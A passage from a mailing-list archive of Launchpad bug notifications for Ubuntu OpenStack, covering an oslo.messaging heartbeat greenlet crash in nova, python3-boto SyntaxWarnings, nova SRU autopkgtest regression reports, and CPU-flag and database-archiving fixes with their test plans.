suboptimal and in very loaded environments this could have a perceived impact on api performance. A separate bug https://bugs.launchpad.net/charm-nova-cloud-controller/+bug/2073260 has been opened to address this. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1934937/+subscriptions From 1934937 at bugs.launchpad.net Thu Aug 1 20:40:49 2024 From: 1934937 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 20:40:49 -0000 Subject: [Bug 1934937] Re: Heartbeat in pthreads in nova-wallaby crashes with greenlet error References: <162569043200.32143.8233415883389284315.malonedeb@wampee.canonical.com> Message-ID: <172254485000.896343.16413171239277848984.malone@juju-98d295-prod-launchpad-2> So if we leave it as is, services under wsgi will keep working, but services NOT under wsgi will crash. If we make this change, services under wsgi will suffer a performance regression (to be confirmed?), and services NOT under wsgi will work. Is that the proposed tradeoff? I suppose this can't this be figured out dynamically? Or is that what you intend to do in https://bugs.launchpad.net/charm-nova-cloud- controller/+bug/2073260? ** Changed in: python-oslo.messaging (Ubuntu Jammy) Status: In Progress => Incomplete -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/1934937 Title: Heartbeat in pthreads in nova-wallaby crashes with greenlet error Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive yoga series: Triaged Status in oslo.messaging: Fix Released Status in nova package in Ubuntu: Invalid Status in python-oslo.messaging package in Ubuntu: Fix Released Status in nova source package in Jammy: Triaged Status in python-oslo.messaging source package in Jammy: Incomplete Bug description: When performing a heartbeat to rabbit (inside a nova-compute process), there is a greenlet error which causes a hard crash. I'm not exactly sure what details are relevant, but can provide more info if there's something that will be useful! This is on RHEL7 (essentially... somewhat custom image based on it) Log snippet: ``` 2021-07-07 19:34:52,686 DEBUG [oslo.messaging._drivers.impl_rabbit] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/oslo_messaging/_drivers/impl_rabbit.py:__init__:608 [279fc413-9d7c-4fad-89e8-8de308658947] Connecting to AMQP server on 127.0.0.1:5671 2021-07-07 19:34:52,699 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:726 heartbeat_tick : for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,699 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:740 heartbeat_tick : Prev sent/recv: None/None, now - 6/6, monotonic - 9634.717472491, last_heartbeat_sent - 9634.717470288, heartbeat int. - 60 for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,700 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:726 heartbeat_tick : for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,701 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:740 heartbeat_tick : Prev sent/recv: 6/6, now - 6/6, monotonic - 9634.719438155, last_heartbeat_sent - 9634.717470288, heartbeat int. - 60 for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,718 DEBUG [amqp] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:_on_start:382 Start from server, version: 0.9, properties: {'capabilities': {'publisher_confirms': True, 'exchange_exchange_bindings': True, 'basic.nack': True, 'consumer_cancel_notify': True, 'connection.blocked': True, 'consumer_priorities': True, 'authentication_failure_close': True, 'per_consumer_qos': True, 'direct_reply_to': True}, 'cluster_name': 'rabbit_5672 at fedb460a.openstack', 'copyright': 'Copyright (c) 2007-2020 VMware, Inc. or its affiliates.', 'information': 'Licensed under the MPL 1.1. Website: https://rabbitmq.com', 'platform': 'Erlang/OTP 23.0.2', 'product': 'RabbitMQ', 'version': '3.8.5'}, mechanisms: [b'PLAIN', b'AMQPLAIN', b'EXTERNAL'], locales: ['en_US'] 2021-07-07 19:34:52,719 DEBUG [amqp] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/channel.py:__init__:104 using channel_id: 1 2021-07-07 19:34:52,720 DEBUG [amqp] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/channel.py:_on_open_ok:444 Channel open 2021-07-07 19:34:52,721 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:726 heartbeat_tick : for connection c0299792d20e42a2b0a17d037d7d3058 Traceback (most recent call last): File "/opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/eventlet/hubs/hub.py", line 476, in fire_timers timer() File "/opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/eventlet/hubs/timer.py", line 59, in __call__ cb(*args, **kw) File "/opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/eventlet/semaphore.py", line 152, in _do_acquire waiter.switch() greenlet.error: cannot switch to a different thread ``` Versions: ``` oslo.messaging==12.7.1 nova==23.0.2 (packaged locally from stable/wallaby as of July 3, 2021) ``` ------------------------------------------------------------------------------- [Impact] The Nova default value of heartbeat_in_pthread needs to be False for non-wsgi services otherwise they crash when attempting to send a heartbeat message e.g. in a greenthread like nova-compute. This backports the patch to Jammy/Yoga in Ubuntu. [Test Plan] * Deploy Openstack Yoga on Jammy and ensure nova-compute has debug=True * ensure "oslo_messaging_rabbit.heartbeat_in_pthread = False" by checking latest entry in /var/log/nova/nova-compute.log * By default a heartbeat is checked 2 times every 60 seconds * Check /var/log/nova/nova-compute.log and ensure that do not see any "greenlet.error: cannot switch to a different thread" errors [Regression Potential] Changing the default to False will mean that while services not running under wsgi will be fixed, services that are running under wsgi will revert back to using their native threading method i.e. greenthreads which is considered suboptimal and in very loaded environments this could have a perceived impact on api performance. A separate bug https://bugs.launchpad.net/charm-nova-cloud-controller/+bug/2073260 has been opened to address this. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1934937/+subscriptions From 1934937 at bugs.launchpad.net Thu Aug 1 20:42:17 2024 From: 1934937 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 20:42:17 -0000 Subject: [Bug 1934937] Re: Heartbeat in pthreads in nova-wallaby crashes with greenlet error References: <162569043200.32143.8233415883389284315.malonedeb@wampee.canonical.com> Message-ID: <172254493751.1352172.979881623211742175.malone@juju-98d295-prod-launchpad-7> Does this still affect nova? -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/1934937 Title: Heartbeat in pthreads in nova-wallaby crashes with greenlet error Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive yoga series: Triaged Status in oslo.messaging: Fix Released Status in nova package in Ubuntu: Invalid Status in python-oslo.messaging package in Ubuntu: Fix Released Status in nova source package in Jammy: Triaged Status in python-oslo.messaging source package in Jammy: Incomplete Bug description: When performing a heartbeat to rabbit (inside a nova-compute process), there is a greenlet error which causes a hard crash. I'm not exactly sure what details are relevant, but can provide more info if there's something that will be useful! This is on RHEL7 (essentially... somewhat custom image based on it) Log snippet: ``` 2021-07-07 19:34:52,686 DEBUG [oslo.messaging._drivers.impl_rabbit] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/oslo_messaging/_drivers/impl_rabbit.py:__init__:608 [279fc413-9d7c-4fad-89e8-8de308658947] Connecting to AMQP server on 127.0.0.1:5671 2021-07-07 19:34:52,699 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:726 heartbeat_tick : for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,699 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:740 heartbeat_tick : Prev sent/recv: None/None, now - 6/6, monotonic - 9634.717472491, last_heartbeat_sent - 9634.717470288, heartbeat int. - 60 for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,700 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:726 heartbeat_tick : for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,701 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:740 heartbeat_tick : Prev sent/recv: 6/6, now - 6/6, monotonic - 9634.719438155, last_heartbeat_sent - 9634.717470288, heartbeat int. - 60 for connection 79f7cf4331b34cb0a2e3608281076773 2021-07-07 19:34:52,718 DEBUG [amqp] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:_on_start:382 Start from server, version: 0.9, properties: {'capabilities': {'publisher_confirms': True, 'exchange_exchange_bindings': True, 'basic.nack': True, 'consumer_cancel_notify': True, 'connection.blocked': True, 'consumer_priorities': True, 'authentication_failure_close': True, 'per_consumer_qos': True, 'direct_reply_to': True}, 'cluster_name': 'rabbit_5672 at fedb460a.openstack', 'copyright': 'Copyright (c) 2007-2020 VMware, Inc. or its affiliates.', 'information': 'Licensed under the MPL 1.1. Website: https://rabbitmq.com', 'platform': 'Erlang/OTP 23.0.2', 'product': 'RabbitMQ', 'version': '3.8.5'}, mechanisms: [b'PLAIN', b'AMQPLAIN', b'EXTERNAL'], locales: ['en_US'] 2021-07-07 19:34:52,719 DEBUG [amqp] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/channel.py:__init__:104 using channel_id: 1 2021-07-07 19:34:52,720 DEBUG [amqp] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/channel.py:_on_open_ok:444 Channel open 2021-07-07 19:34:52,721 DEBUG [amqp.connection.Connection.heartbeat_tick] /opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/amqp/connection.py:heartbeat_tick:726 heartbeat_tick : for connection c0299792d20e42a2b0a17d037d7d3058 Traceback (most recent call last): File "/opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/eventlet/hubs/hub.py", line 476, in fire_timers timer() File "/opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/eventlet/hubs/timer.py", line 59, in __call__ cb(*args, **kw) File "/opt/openstack/venv/nova-23.0.20031033070/lib/python3.8/site-packages/eventlet/semaphore.py", line 152, in _do_acquire waiter.switch() greenlet.error: cannot switch to a different thread ``` Versions: ``` oslo.messaging==12.7.1 nova==23.0.2 (packaged locally from stable/wallaby as of July 3, 2021) ``` ------------------------------------------------------------------------------- [Impact] The Nova default value of heartbeat_in_pthread needs to be False for non-wsgi services otherwise they crash when attempting to send a heartbeat message e.g. in a greenthread like nova-compute. This backports the patch to Jammy/Yoga in Ubuntu. [Test Plan] * Deploy Openstack Yoga on Jammy and ensure nova-compute has debug=True * ensure "oslo_messaging_rabbit.heartbeat_in_pthread = False" by checking latest entry in /var/log/nova/nova-compute.log * By default a heartbeat is checked 2 times every 60 seconds * Check /var/log/nova/nova-compute.log and ensure that do not see any "greenlet.error: cannot switch to a different thread" errors [Regression Potential] Changing the default to False will mean that while services not running under wsgi will be fixed, services that are running under wsgi will revert back to using their native threading method i.e. greenthreads which is considered suboptimal and in very loaded environments this could have a perceived impact on api performance. A separate bug https://bugs.launchpad.net/charm-nova-cloud-controller/+bug/2073260 has been opened to address this. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1934937/+subscriptions From 2075551 at bugs.launchpad.net Thu Aug 1 22:08:40 2024 From: 2075551 at bugs.launchpad.net (Eric Lopez) Date: Thu, 01 Aug 2024 22:08:40 -0000 Subject: [Bug 2075551] [NEW] SyntaxWarning messages on python3-boto install Message-ID: <172255012071.2213979.15478828004375885898.malonedeb@juju-98d295-prod-launchpad-4> Public bug reported: Description: Ubuntu 24.04 LTS Release: 24.04 apt-cache policy python3-boto python3-boto: Installed: 2.49.0-4.1 Candidate: 2.49.0-4.1 Version table: *** 2.49.0-4.1 500 500 http://us-east-1.ec2.archive.ubuntu.com/ubuntu noble/universe amd64 Packages 100 /var/lib/dpkg/status python3: Installed: 3.12.3-0ubuntu1 Candidate: 3.12.3-0ubuntu1 Version table: *** 3.12.3-0ubuntu1 500 500 http://us-east-1.ec2.archive.ubuntu.com/ubuntu noble/main amd64 Packages 100 /var/lib/dpkg/status Setting up python3-boto (2.49.0-4.1) ... /usr/lib/python3/dist-packages/boto/__init__.py:1105: SyntaxWarning: invalid escape sequence '\c' """ /usr/lib/python3/dist-packages/boto/cloudfront/distribution.py:512: SyntaxWarning: invalid escape sequence '\*' """ /usr/lib/python3/dist-packages/boto/cloudsearchdomain/layer1.py:79: SyntaxWarning: invalid escape sequence '\`' """ /usr/lib/python3/dist-packages/boto/connection.py:672: SyntaxWarning: invalid escape sequence '\w' '(?:(?P[\w\-\.]+):(?P.*)@)?' /usr/lib/python3/dist-packages/boto/connection.py:673: SyntaxWarning: invalid escape sequence '\w' '(?P[\w\-\.]+)' /usr/lib/python3/dist-packages/boto/connection.py:674: SyntaxWarning: invalid escape sequence '\d' '(?::(?P\d+))?' /usr/lib/python3/dist-packages/boto/gs/resumable_upload_handler.py:238: SyntaxWarning: invalid escape sequence '\d' m = re.search('bytes=(\d+)-(\d+)', range_spec) /usr/lib/python3/dist-packages/boto/https_connection.py:80: SyntaxWarning: invalid escape sequence '\.' host_re = host.replace('.', '\.').replace('*', '[^.]*') /usr/lib/python3/dist-packages/boto/opsworks/layer1.py:2640: SyntaxWarning: invalid escape sequence '\A' """ /usr/lib/python3/dist-packages/boto/pyami/config.py:98: SyntaxWarning: invalid escape sequence '\s' match = re.match("^#import[\s\t]*([^\s^\t]*)[\s\t]*$", line) /usr/lib/python3/dist-packages/boto/redshift/layer1.py:327: SyntaxWarning: invalid escape sequence '\,' """ /usr/lib/python3/dist-packages/boto/redshift/layer1.py:2164: SyntaxWarning: invalid escape sequence '\)' """ /usr/lib/python3/dist-packages/boto/redshift/layer1.py:2264: SyntaxWarning: invalid escape sequence '\,' """ /usr/lib/python3/dist-packages/boto/sdb/db/manager/sdbmanager.py:348: SyntaxWarning: invalid escape sequence '\/' match = re.match("^s3:\/\/([^\/]*)\/(.*)$", value.id) /usr/lib/python3/dist-packages/boto/sdb/db/manager/sdbmanager.py:363: SyntaxWarning: invalid escape sequence '\/' match = re.match("^s3:\/\/([^\/]*)\/(.*)$", value) /usr/lib/python3/dist-packages/boto/sdb/db/property.py:265: SyntaxWarning: invalid escape sequence '\/' validate_regex = "^s3:\/\/([^\/]*)\/(.*)$" ** Affects: python-boto (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to python-boto in Ubuntu. https://bugs.launchpad.net/bugs/2075551 Title: SyntaxWarning messages on python3-boto install Status in python-boto package in Ubuntu: New Bug description: Description: Ubuntu 24.04 LTS Release: 24.04 apt-cache policy python3-boto python3-boto: Installed: 2.49.0-4.1 Candidate: 2.49.0-4.1 Version table: *** 2.49.0-4.1 500 500 http://us-east-1.ec2.archive.ubuntu.com/ubuntu noble/universe amd64 Packages 100 /var/lib/dpkg/status python3: Installed: 3.12.3-0ubuntu1 Candidate: 3.12.3-0ubuntu1 Version table: *** 3.12.3-0ubuntu1 500 500 http://us-east-1.ec2.archive.ubuntu.com/ubuntu noble/main amd64 Packages 100 /var/lib/dpkg/status Setting up python3-boto (2.49.0-4.1) ... /usr/lib/python3/dist-packages/boto/__init__.py:1105: SyntaxWarning: invalid escape sequence '\c' """ /usr/lib/python3/dist-packages/boto/cloudfront/distribution.py:512: SyntaxWarning: invalid escape sequence '\*' """ /usr/lib/python3/dist-packages/boto/cloudsearchdomain/layer1.py:79: SyntaxWarning: invalid escape sequence '\`' """ /usr/lib/python3/dist-packages/boto/connection.py:672: SyntaxWarning: invalid escape sequence '\w' '(?:(?P[\w\-\.]+):(?P.*)@)?' /usr/lib/python3/dist-packages/boto/connection.py:673: SyntaxWarning: invalid escape sequence '\w' '(?P[\w\-\.]+)' /usr/lib/python3/dist-packages/boto/connection.py:674: SyntaxWarning: invalid escape sequence '\d' '(?::(?P\d+))?' /usr/lib/python3/dist-packages/boto/gs/resumable_upload_handler.py:238: SyntaxWarning: invalid escape sequence '\d' m = re.search('bytes=(\d+)-(\d+)', range_spec) /usr/lib/python3/dist-packages/boto/https_connection.py:80: SyntaxWarning: invalid escape sequence '\.' host_re = host.replace('.', '\.').replace('*', '[^.]*') /usr/lib/python3/dist-packages/boto/opsworks/layer1.py:2640: SyntaxWarning: invalid escape sequence '\A' """ /usr/lib/python3/dist-packages/boto/pyami/config.py:98: SyntaxWarning: invalid escape sequence '\s' match = re.match("^#import[\s\t]*([^\s^\t]*)[\s\t]*$", line) /usr/lib/python3/dist-packages/boto/redshift/layer1.py:327: SyntaxWarning: invalid escape sequence '\,' """ /usr/lib/python3/dist-packages/boto/redshift/layer1.py:2164: SyntaxWarning: invalid escape sequence '\)' """ /usr/lib/python3/dist-packages/boto/redshift/layer1.py:2264: SyntaxWarning: invalid escape sequence '\,' """ /usr/lib/python3/dist-packages/boto/sdb/db/manager/sdbmanager.py:348: SyntaxWarning: invalid escape sequence '\/' match = re.match("^s3:\/\/([^\/]*)\/(.*)$", value.id) /usr/lib/python3/dist-packages/boto/sdb/db/manager/sdbmanager.py:363: SyntaxWarning: invalid escape sequence '\/' match = re.match("^s3:\/\/([^\/]*)\/(.*)$", value) /usr/lib/python3/dist-packages/boto/sdb/db/property.py:265: SyntaxWarning: invalid escape sequence '\/' validate_regex = "^s3:\/\/([^\/]*)\/(.*)$" To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/python-boto/+bug/2075551/+subscriptions From 2048517 at bugs.launchpad.net Thu Aug 1 23:28:43 2024 From: 2048517 at bugs.launchpad.net (Ubuntu SRU Bot) Date: Thu, 01 Aug 2024 23:28:43 -0000 Subject: [Bug 2048517] Autopkgtest regression report (nova/2:21.2.4-0ubuntu2.12) References: <170470935000.2322881.14682222740716386457.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <20240801232843.79E9AFC051@ubuntu-archive-toolbox.internal> All autopkgtests for the newly accepted nova (2:21.2.4-0ubuntu2.12) for focal have finished running. The following regressions have been reported in tests triggered by the package: ceilometer/1:14.1.0-0ubuntu1 (amd64, ppc64el, s390x) nova/2:21.2.4-0ubuntu2.12 (amd64, arm64, armhf, ppc64el, s390x) Please visit the excuses page listed below and investigate the failures, proceeding afterwards as per the StableReleaseUpdates policy regarding autopkgtest regressions [1]. https://people.canonical.com/~ubuntu-archive/proposed- migration/focal/update_excuses.html#nova [1] https://wiki.ubuntu.com/StableReleaseUpdates#Autopkgtest_Regressions Thank you! -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/2048517 Title: EPYC-Rome model without XSAVES may break live migration since the removal of the flag on the physical CPU Status in nova package in Ubuntu: Fix Released Status in qemu package in Ubuntu: Invalid Status in nova source package in Focal: Fix Committed Status in qemu source package in Focal: Invalid Bug description: [ Impact ] * Live migration is increasingly being impacted by changes to CPU flags (e.g., 'xsaves' disabled on AMD EPYC; PKRU/'xsave' behavior changes), which prevents migration on otherwise identical hypervisors, but the only difference is a CPU flag (i.e., source hypervisor still has flag enabled; destination hypervisor had flag disabled on a kernel update). * These CPU flags updates require changes to CPU model definitions in several places (qemu, libvirt, and nova if openstack is being used), which is a lot of overhead for each subtle variation that may appear. * Fortunately, it's possible to reduce the changes required by allowing nova to customize CPU flags to enable/disable _on top_ of a CPU model definition (e.g., the same AMD EPYC CPU model with 'xsaves' disabled). * This change is present in Jammy and later, and is backward compatible with the existing config files, as the (new) enable/disable operators are an optional prefix to existing flags (e.g., '-xsaves' or '+xsaves'). [ Test Plan ] * Deploy Openstack with 2 hypervisors (or more), and configure nova.conf with a cpu_model and cpu_extra_flags to disable/enable, for example: # grep cpu_model /etc/nova/nova.conf cpu_model = EPYC-Rome cpu_model_extra_flags = -xsaves * Start a VM before/after the package upgrade (focal-proposed), checking the VM XML for that flag (e.g., policy change from require to disable); for example: Before: # virsh dumpxml instance- | grep xsaves After: # virsh dumpxml instance- | grep xsaves * Ensure that nova is able to start *with* and *without* enable/disable cpu flag changes. * Ensure live migration works on both ways across the 2 hypervisors *with* and *without* enable/disable cpu flag changes. [ Regression Potential ] * Regressions would likely manifest in the areas modified by the patches, i.e., parsing the config file's cpu flags (on nova startup), generating a VM's XML file (on nova VM start/creation), and also live migration. * The patched packages have been evaluated/running in production for 2-3 months now, and live migration have been performed, without any issues. [ Other Info ] * The code changes had their callee-paths reviewed, and potential issues were not identified. * The patches are already present in Jammy and later. [ Original Bug Description ] The linux kernel upstream disabled XSAVES on AMD EPYC Rome CPUs ([1]). Upstream qemu shortly followed with a patch adding a CPU model version of EPYC-Rome without XSAVES ([2]) The change in the kernel has been backported to ubuntu focal ([3]). Without further workarounds or the adapted CPU model in qemu this will lead to a situation were virtual machines with an EPYC-Rome CPU model created on hypervisors with newer EPYC CPUs will have the XSAVES flag enabled, thus preventing live migration to hypervisors with EPYC Rome CPUs were XSAVES is no longer available. Therefore I would like to argue that the patch adapting the CPU model in qemu should also be backported to ubuntu focal. [1] https://lore.kernel.org/all/20230307174643.1240184-1-andrew.cooper3 at citrix.com/ [2] https://patchew.org/QEMU/20230524213748.8918-1-davydov-max at yandex-team.ru/ [3] https://bugs.launchpad.net/ubuntu/+source/linux/+bug/2023420 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/2048517/+subscriptions From 2024258 at bugs.launchpad.net Thu Aug 1 23:28:43 2024 From: 2024258 at bugs.launchpad.net (Ubuntu SRU Bot) Date: Thu, 01 Aug 2024 23:28:43 -0000 Subject: [Bug 2024258] Autopkgtest regression report (nova/2:21.2.4-0ubuntu2.12) References: <168694028395.3457306.2953697720271926959.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <20240801232843.2E868FC037@ubuntu-archive-toolbox.internal> All autopkgtests for the newly accepted nova (2:21.2.4-0ubuntu2.12) for focal have finished running. The following regressions have been reported in tests triggered by the package: ceilometer/1:14.1.0-0ubuntu1 (amd64, ppc64el, s390x) nova/2:21.2.4-0ubuntu2.12 (amd64, arm64, armhf, ppc64el, s390x) Please visit the excuses page listed below and investigate the failures, proceeding afterwards as per the StableReleaseUpdates policy regarding autopkgtest regressions [1]. https://people.canonical.com/~ubuntu-archive/proposed- migration/focal/update_excuses.html#nova [1] https://wiki.ubuntu.com/StableReleaseUpdates#Autopkgtest_Regressions Thank you! -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/2024258 Title: Performance degradation archiving DB with large numbers of FK related records Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) antelope series: In Progress Status in OpenStack Compute (nova) wallaby series: In Progress Status in OpenStack Compute (nova) xena series: In Progress Status in OpenStack Compute (nova) yoga series: In Progress Status in OpenStack Compute (nova) zed series: In Progress Status in nova package in Ubuntu: Won't Fix Status in nova source package in Focal: Fix Committed Status in nova source package in Jammy: Fix Committed Bug description: [Impact] Originally, Nova archives deleted rows in batches consisting of a maximum number of parent rows (max_rows) plus their child rows, all within a single database transaction. This approach limits the maximum value of max_rows that can be specified by the caller due to the potential size of the database transaction it could generate. Additionally, this behavior can cause the cleanup process to frequently encounter the following error: oslo_db.exception.DBError: (pymysql.err.InternalError) (3100, "Error on observer while running replication hook 'before_commit'.") The error arises when the transaction exceeds the group replication transaction size limit, a safeguard implemented to prevent potential MySQL crashes [1]. The default value for this limit is approximately 143MB. [Fix] An upstream commit has changed the logic to archive one parent row and its related child rows in a single database transaction. This change allows operators to choose more predictable values for max_rows and achieve more progress with each invocation of archive_deleted_rows. Additionally, this commit reduces the chances of encountering the issue where the transaction size exceeds the group replication transaction size limit. commit 697fa3c000696da559e52b664c04cbd8d261c037 Author: melanie witt CommitDate: Tue Jun 20 20:04:46 2023 +0000     database: Archive parent and child rows "trees" one at a time [Test Plan] 1. Create an instance and delete it in OpenStack. 2. Log in to the Nova database and confirm that there is an entry with a deleted_at value that is not NULL. select display_name, deleted_at from instances where deleted_at <> 0; 3. Execute the following command, ensuring that the timestamp specified in --before is later than the deleted_at value: nova-manage db archive_deleted_rows --before "XXX-XX-XX XX:XX:XX" --verbose --until-complete 4. Log in to the Nova database again and confirm that the entry has been archived and removed. select display_name, deleted_at from instances where deleted_at <> 0; [Where problems could occur] The commit changes the logic for archiving deleted entries to reduce the size of transactions generated during the operation. If the patch contains errors, it will only impact the archiving of deleted entries and will not affect other functionalities. [1] https://bugs.mysql.com/bug.php?id=84785 [Original Bug Description] Observed downstream in a large scale cluster with constant create/delete server activity and hundreds of thousands of deleted instances rows. Currently, we archive deleted rows in batches of max_rows parents + their child rows in a single database transaction. Doing it that way limits how high a value of max_rows can be specified by the caller because of the size of the database transaction it could generate. For example, in a large scale deployment with hundreds of thousands of deleted rows and constant server creation and deletion activity, a value of max_rows=1000 might exceed the database's configured maximum packet size or timeout due to a database deadlock, forcing the operator to use a much lower max_rows value like 100 or 50. And when the operator has e.g. 500,000 deleted instances rows (and millions of deleted rows total) they are trying to archive, being forced to use a max_rows value several orders of magnitude lower than the number of rows they need to archive is a poor user experience and makes it unclear if archive progress is actually being made. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/2024258/+subscriptions From 1999814 at bugs.launchpad.net Thu Aug 1 23:28:43 2024 From: 1999814 at bugs.launchpad.net (Ubuntu SRU Bot) Date: Thu, 01 Aug 2024 23:28:43 -0000 Subject: [Bug 1999814] Autopkgtest regression report (nova/2:21.2.4-0ubuntu2.12) References: <167112824615.38411.17486317442666564453.malonedeb@angus.canonical.com> Message-ID: <20240801232843.8D137100CF8@ubuntu-archive-toolbox.internal> All autopkgtests for the newly accepted nova (2:21.2.4-0ubuntu2.12) for focal have finished running. The following regressions have been reported in tests triggered by the package: ceilometer/1:14.1.0-0ubuntu1 (amd64, ppc64el, s390x) nova/2:21.2.4-0ubuntu2.12 (amd64, arm64, armhf, ppc64el, s390x) Please visit the excuses page listed below and investigate the failures, proceeding afterwards as per the StableReleaseUpdates policy regarding autopkgtest regressions [1]. https://people.canonical.com/~ubuntu-archive/proposed- migration/focal/update_excuses.html#nova [1] https://wiki.ubuntu.com/StableReleaseUpdates#Autopkgtest_Regressions Thank you! -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/1999814 Title: [SRU] Allow for specifying common baseline CPU model with disabled feature Status in OpenStack Compute (nova): Expired Status in OpenStack Compute (nova) ussuri series: New Status in OpenStack Compute (nova) victoria series: Won't Fix Status in OpenStack Compute (nova) wallaby series: Won't Fix Status in OpenStack Compute (nova) xena series: Won't Fix Status in OpenStack Compute (nova) yoga series: New Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Won't Fix Status in nova source package in Focal: Fix Committed Status in nova source package in Jammy: Fix Committed Bug description: ******** SRU TEMPLATE AT THE BOTTOM ******* Hello, This is very similar to pad.lv/1852437 (and the related blueprint at https://blueprints.launchpad.net/nova/+spec/allow-disabling-cpu- flags), but there is a very different and important nuance. A customer I'm working with has two classes of blades that they're trying to use. Their existing ones are Cascade Lake-based; they are presently using the Cascadelake-Server-noTSX CPU model via libvirt.cpu_model in nova.conf. Their new blades are Ice Lake-based, which is a newer processor, which typically would also be able to run based on the Cascade Lake feature set - except that these Ice Lake processors lack the MPX feature defined in the Cascadelake-Server- noTSX model. The result of this is evident when I try to start nova on the new blades with the Ice Lake CPUs. Even if I specify the following in my nova.conf: [libvirt] cpu_mode = custom cpu_model = Cascadelake-Server-noTSX cpu_model_extra_flags = -mpx That is not enough to allow Nova to start; it fails in the libvirt driver in the _check_cpu_compatibility function: 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last): 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 771, in _check_cpu_compatibility 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service self._compare_cpu(cpu, self._get_cpu_info(), None) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 8817, in _compare_cpu 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u}) 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Unacceptable CPU info: CPU doesn't have compatibility. 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service During handling of the above exception, another exception occurred: 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last): 